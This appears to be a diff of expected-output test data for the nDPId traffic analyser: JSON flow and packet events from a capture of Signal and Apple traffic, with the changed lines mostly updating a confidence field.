00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569051264666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264666,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7CAbvJrSrvAAAAALAC\/\/+7dwAAAgQFtAEDAwcBAQgKKFWUiQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569051264775,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264775,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sL5Zid4ya0q8KASaN+dwQAAAgQFrAQCCApkFUDdKFWUiQEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1569051264776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7CAbvJrSrw+WYneYAQBAsw7wAAAQEICihVlPVkFUDd"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV0AADQGy0wXORgQwKgCEQG73rjhiC89LB07wYAYAQKY+AAAAQEICpZOcwIoVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} 
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0yV4AADQGy2MXORgQwKgCEQG73rjhiC9VLB07wYARAQL5ggAAAQEICpZOcwIoVP9f"} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569051266743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266743,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV8AADQGy0oXORgQwKgCEQG73rjhiC89LB07wYAYAQKXnQAAAQEICpZOdF0oVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051267121,"flow_last_seen":1569051267121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051267121,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569051267121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051267121,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGbbHAqAIRDSP9Kt7DAbsjR8rsAAAAALAC\/\/\/U1AAAAgQFtAEDAwcBAQgKKFWeFwAAAAAEAgAA"} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569051267154,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051267154,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAPEG\/LQNI\/0qwKgCEQG73sO\/wI8zI0fK7aAScSCWtAAAAgQFrAQCCAqvNN\/RKFWeFwEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569051267161,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051267161,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGbb3AqAIRDSP9Kt7DAbsjR8rtv8CPNIAQBAsybAAAAQEICihVnjqvNN\/R"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, 
ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, 
ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
